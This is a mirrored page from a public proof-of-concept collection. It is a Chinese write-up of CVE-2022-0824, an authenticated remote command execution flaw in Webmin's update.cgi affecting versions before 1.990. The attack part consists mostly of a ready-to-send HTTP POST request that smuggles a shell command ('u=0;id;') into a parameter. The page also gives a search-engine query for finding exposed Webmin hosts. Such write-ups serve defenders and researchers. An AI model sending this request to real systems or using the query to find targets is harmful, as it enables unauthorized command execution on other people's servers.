admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

39 lines
807 B
Markdown
Raw Blame History

# Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824
## 漏洞描述
Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。
Webmin 1.990之前版本存在安全漏洞,该漏洞源于软件中存在不正确的访问控制,攻击者可以利用该漏洞实现远程代码执行
## 漏洞影响
```
Webmin < 1.990
```
## 网络测绘
```
app="webmin"
```
## 漏洞复现
登录页面
![image-20220829101939637](images/202208291022969.png)
登录后发送请求包
```
POST /package-updates/update.cgi HTTP/1.1
Cookie: sid=882af4543067bc6214d2c769325f3b2f
Referer: http:///package-updates/update.cgi?xnavigation=1
mode=new&search=ssh&redir=&redirdesc=&u=0;id;&confirm=Install+Now
```
![image-20220829102233314](images/202208291022378.png)
Reference in New Issue View Git Blame Copy Permalink